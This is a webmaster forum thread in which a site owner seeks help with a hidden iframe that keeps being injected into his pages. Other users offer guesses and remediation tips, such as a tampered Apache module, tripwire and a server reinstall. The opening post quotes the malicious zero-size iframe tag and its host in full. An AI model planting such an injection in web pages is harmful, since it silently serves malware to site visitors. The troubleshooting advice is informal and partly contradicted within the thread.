Site possibly got hacked

[jamie55]

Hi,

I'm having some major problems with my site www.jamies-galleries.com . I am using Comus Thumbs and UCJ.

This code: <iframe src="http://iframedollars.biz/dl/adv514.php" width=0 height=0></iframe>

is randomly added to my mainpages, I've checked my templates and the code is not there. I appears and dissapears every X minutes, doesn't seem like a pattern to me, just random.

My host can't find anything on my server, and the author of Comus have checked too, he found nothing. I've added a firewall to my server which only allows me to access via FTP, I've also changed all my password - so there's no way anyone can get in manually. There has to be a script on the server somewhere, but can't find it ...

I'm loosing traffic and prod as we speak, if anyone have any experience with the same stuff, please reply asap as I really need your help!

Thanks for reading!

Regards,
Jamie

[Doc911]

Trojan.Anicmoo

[Holly]

Don't click on that link unless you have some kind of AV running.

[sixxxthsense]

Quote:

Originally Posted by Holly

Don't click on that link unless you have some kind of AV running.

2 late hehe ''

i should be fine ;)

[sixxxthsense]

jamie do you use IE to edit comus thumbs pages?

[fireorange]

Yeah, I noticed it on Saturday.

http://www.gofuckyourself.com/showthread.php?t=464621

[Spunky]

Relatively harmless..see that on a few sites..do a search ..there was a thread about your site awhile back

[Ramster]

Too bad Jamie. Same thing has happened to many others. TommysBookmarks too and I think he said the infection was right in apache on the server.

[jamie55]

Quote:

Originally Posted by sixxxthsense

jamie do you use IE to edit comus thumbs pages?

I use Opera 8.0 to edit Comus.

Regarding what spunky said, I had a kinda same situation to my site a while back, but that was a security breach within comus, that got patched immediately. I take it the same hacker didn't entirely loose contact with my server and can still do shit too it.

I did a search on GFY and found that thehun and sleazydream got attacked by the same stuff, can't get in touch with them unfortunately ...

Any ideas on what todo / check?

Thanks

[fireorange]

I read somewhere about a hacked up Apache module which inserts the code while serving the surfer the pages.

[jamie55]

Quote:

Originally Posted by fireorange

Yeah, I noticed it on Saturday.

http://www.gofuckyourself.com/showthread.php?t=464621

Ahh shit, I saw that post now. I'll have my host check apache asap, see if there's anything in there.

[jamie55]

Had my host check apache, he found nothing ... any other clues? I really need help on this!

[Barefootsies]

I had a similar problem when I first started my TGP but the problem was the page was going in the wrong directory. Simple and stupid I know, but I had to make sure to delete extra pages, and just keep the ../../whatever.shtml.

Basically what was happening was when it would do a page rebuild, it would use an older page, not the one with the code on it. So every 10-15 minutes I'd get an older version of the page, and through trial and error in the middle of the night found problem was just duplicates, and wrong directory.

[Homer]

theres a trojan

[skillfull]

the worst is that guy isnt even doing some nice cash with that

http://iframedollars.biz/dl/stats.php?adv=adv514

[fireorange]

I can't believe your host hasn't found the problem yet.

Bitchslap c h o o p a for me, I was gonna get a few servers from them last week!

[darksoul]

If you have root access to your server, hit me up I'll take a look.

[MrVids]

heya jamie, i know you said your host looked on your box to see what it is but the exploit is 99% for sure a module that was installed on Apache. Tell your host to look for mod_stats.so and see if it exists anywhere on the box and also check to see if it appears in your httpd.conf. i run a couple tgp's, and while i've been fortunate enough to not get hit by this, a good friend of mine has and that is what his hosting co ended up finding.

also, have your hosting co installed tripwire. it will do a reporte of any major files that were edited, so you can research things like this with a little more efficiency.

[MrVids]

whoa, i just checked out who you host with. my buddy that got hacked is also a customer of ch00pa. there must be something inherintly insecure about their apache setup. give a shout to their tech Kris, he was working on my buddy's site this weekend.

[wdsguy]

Your hosting co sucks if they can't find the problem within apache.

[jamie55]

Ok, I've got it confirmed many times now, there is not a problem with apache.

My host says, "the problem is not with apache, it is with the software that runs on apache". hahahahahaha has been working on it for a 2 days now.

Quote:

whoa, i just checked out who you host with. my buddy that got hacked is also a customer of ch00pa. there must be something inherintly insecure about their apache setup. give a shout to their tech Kris, he was working on my buddy's site this weekend.

Host says my problem is completely different from what Kris was working on this weekend ...

Man this is giving me a headake

[BigRod]

Get a NEW host!

[BigRod]

If you want a kick ass host icq me!

[jamie55]

MrVids, could you hit me up on icq: 162863896 , I just wanna ask you some questions, thanks!

[SmokeyTheBear]

hmmmmmm m

[Ramster]

Maybe your box was rooted. Check in any /tmp for anything owned by root. I also read that your root crontab for the html generator is a way a hacker might have gained access.

[fireorange]

Seriously though, once you're hacked, you gotta format the server and re-installing everything.

No doubt he's already installed a rootkit so you'll never be able to get rid of him.